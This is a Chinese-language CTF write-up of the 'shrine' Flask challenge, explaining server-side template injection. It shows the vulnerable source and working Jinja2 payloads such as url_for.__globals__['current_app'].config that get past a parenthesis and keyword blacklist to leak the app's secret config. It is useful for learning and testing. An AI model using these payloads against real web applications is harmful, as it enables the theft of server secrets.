SSTI模板注入類題目
模板注入涉及的是服務端Web應用使用模板引擎渲染用戶請求的過程 服務端把用戶輸入的內容渲染成模板就可能造成SSTI(Server-Side Template Injection)
模板渲染接受的參數需要用兩個大括號括起來{{}},所以我們需要在大括號內構造參數形成注入
SSTI注入需要知道用的是什么模板引擎,參考這張圖片
整理一下題目給出的python代碼
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
可以看到有兩個路由,第一個路由給出了顯示出源代碼,第二個路由在/shrine/路徑下提交參數,模板中設定{{ }}包括的內容為后端變量,% %包括的內容為邏輯語句
我們簡單測試注入/shrine/{{2+2}}
我們查看源碼,可以知道我們提交的參數之中的()會被置為空,同時會將黑名單內的內容遍歷一遍,把參數內的與黑名單相同的置為None
/shrine/{{config}}
如果沒有黑名單的時候,我們可以使用config,傳入 config,或者使用self傳入 {{self.__dict__}}
當config,self,()都被過濾的時候,為了獲取訊息,我們需要讀取一些例如current_app這樣的全局變量。
看了其他師傅的WP,python的沙箱逃逸這里的方法是利用python對象之間的引用關系來調用被禁用的函數對象。
這里有兩個函數包含了current_app全局變量,url_for和get_flashed_messages
官方文檔在https://flask.palletsprojects.com/en/1.0.x/api/#flask.get_flashed_messages
我們注入{url_for.__globals__}得到
current_app是當前使用的app,繼續注入當前app的config
{url_for.__globals__['current_app'].config}
可以看到get flag
get_flashed_messages注入的方法同理
繼續學習,積累思路
參考鏈接:
http://shaobaobaoer.cn/archives/665/tokyo-westerns-ctf-2018-web-wp#shrine
http://luty.tech/2018/11/13/CTF%E9%A2%98%E8%A7%A3%E8%AE%B0%E5%BD%95-web%E7%AF%87/
http://www.cl4y.top/buuctf_wp/#toc-head-37